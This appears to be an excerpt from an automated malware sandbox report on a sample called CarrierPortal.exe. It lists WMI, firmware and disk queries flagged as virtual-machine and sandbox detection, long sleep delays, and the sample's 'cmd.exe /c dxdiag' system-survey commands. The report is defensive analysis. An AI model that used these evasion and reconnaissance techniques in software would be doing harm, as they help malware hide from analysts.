Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} WHERE ResultClass = Win32_DiskDrive
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} WHERE ResultClass = Win32_DiskDrive
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\dxdiag.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\dxdiag.exeSystem information queried: FirmwareTableInformation
Source: C:\Windows\System32\Taskmgr.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8928Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 971Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4992Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: CarrierPortal.exeBinary or memory string: Native image does not support the following JVMCI CPU features:
Source: Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Hyper-V Guest Shutdown Servicej
Source: CarrierPortal.exeBinary or memory string: jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD74000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processord<
Source: CarrierPortal.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu
Source: Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Devicennectio
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes&
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CE41000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CE41000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V HypervisorA
Source: CarrierPortal.exeBinary or memory string: :jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: CarrierPortal.exeBinary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.c
Source: CarrierPortal.exeBinary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.b
Source: CarrierPortal.exeBinary or memory string: Hyper-V RAW
Source: Taskmgr.exe, 00000019.00000003.1949755033.0000025B1CCC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CE5C000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
Source: Taskmgr.exe, 00000019.00000003.1967596461.0000025B1C8AE000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imeW32TimeVolume Shadow CopyVSSHyper-V V
Source: ModuleAnalysisCache.16.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: dxdiag.exe, 00000015.00000002.1820190933.00000143D4A89000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1802129587.00000143D4A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6Microsoft Hyper-V Virtualization Infrastructure Driver8A
Source: Taskmgr.exe, 00000019.00000003.1947205276.0000025B1C303000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1991617518.0000025B1C303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDC9000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDC9000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDDC000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processormui
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: CarrierPortal.exeBinary or memory string: 23.0.1+11-jvmci-b01
Source: CarrierPortal.exeBinary or memory string: @Native image does not support the following JVMCI CPU features:
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service~
Source: Taskmgr.exe, 00000019.00000003.1967898140.0000025B1CD14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: Taskmgr.exe, 00000019.00000003.1975341909.0000025B1CCF5000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1939681656.0000025B1CCD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V Heartbeat ServiceV
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDDC000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processori
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDF6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual ProcessorbR$
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mfvvegwrrrfsegt Bus Pipes
Source: CarrierPortal.exeBinary or memory string: 23.0.1+11-jvmci-b01C
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDC9000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
Source: Taskmgr.exe, 00000019.00000003.1943443474.0000025B1C317000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1954113877.0000025B1C320000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1967210901.0000025B1C321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mfvvegwrrrfsegt Bus
Source: ModuleAnalysisCache.16.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDF6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeatk
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CE5C000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CE5C000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: dxdiag.exe, 00000004.00000002.1272359556.000001D764630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure Driverwvid.inf8A
Source: Taskmgr.exe, 00000019.00000003.1885313401.0000025B1C8F0000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1956815473.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1995772531.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: Taskmgr.exe, 00000019.00000002.1996865363.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Hyper-V Guest Service Interface
Source: CarrierPortal.exeBinary or memory string: ,jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: CarrierPortal.exeBinary or memory string: VirtualMachineError.java
Source: Taskmgr.exe, 00000019.00000002.1994778760.0000025B1C8A6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor[
Source: Taskmgr.exe, 00000019.00000003.1885313401.0000025B1C8F0000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1956815473.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1995772531.0000025B1C91B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
Source: Taskmgr.exe, 00000019.00000002.1994778760.0000025B1C8A6000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :Hyper-V Data Exchange Service
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes.
Source: CarrierPortal.exeBinary or memory string: jdk.vm.ci.services.JVMCIServiceLocator
Source: CarrierPortal.exeBinary or memory string: java.lang.VirtualMachineError
Source: Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BHyper-V PowerShell Direct Service
Source: CarrierPortal.exeBinary or memory string: &jdk.vm.ci.services.JVMCIServiceLocator
Source: CarrierPortal.exe, 00000000.00000002.1282205867.00000146244CC000.00000004.00000020.00020000.00000000.sdmp, CarrierPortal.exe, 00000012.00000002.1828597563.000001E777169000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Taskmgr.exe, 00000019.00000003.1918027398.0000025B1C984000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1968715738.0000025B1C9A5000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1885313401.0000025B1C8F0000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1875620351.0000025B1C985000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1979771097.0000025B1C9A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HHyper-V Time Synchronization Servicell.mun
Source: Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD57000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD54000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZHyper-V Remote Desktop Virtualization Service[
Source: CarrierPortal.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu-
Source: dxdiag.exe, 00000004.00000002.1272570923.000001D764661000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000004.00000003.1265814890.000001D76465D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1806753933.00000143D4A89000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000002.1820190933.00000143D4A89000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1802129587.00000143D4A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $Microsoft Hyper-V Generation Counter8A
Source: CarrierPortal.exe, 00000000.00000002.1285285503.0000014625380000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 23.0.1+11-jvmci-b01`
Source: Taskmgr.exe, 00000019.00000003.1947205276.0000025B1C303000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1991617518.0000025B1C303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: CarrierPortal.exeBinary or memory string: RSAPrivateCrtKeyImpl_MVIvmCIOqmIyY4BxzNhymF
Source: ModuleAnalysisCache.16.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD91000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1996958200.0000025B1CD92000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD91000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1974956912.0000025B1CD81000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HHyper-V Volume Shadow Copy Requestor
Source: CarrierPortal.exeBinary or memory string: 1com.oracle.svm.enterprise.virtualization.vmm.qemu9r
Source: CarrierPortal.exeBinary or memory string: jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: CarrierPortal.exeBinary or memory string: +RSAPrivateCrtKeyImpl_MVIvmCIOqmIyY4BxzNhymFo
Source: CarrierPortal.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.b
Source: Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e Shadow Copy RequestorvmicvssHyper-V Powe
Source: Taskmgr.exe, 00000019.00000002.1996812059.0000025B1CD56000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD57000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1968477806.0000025B1CD56000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD54000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: CarrierPortal.exeBinary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu.c
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"Jump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
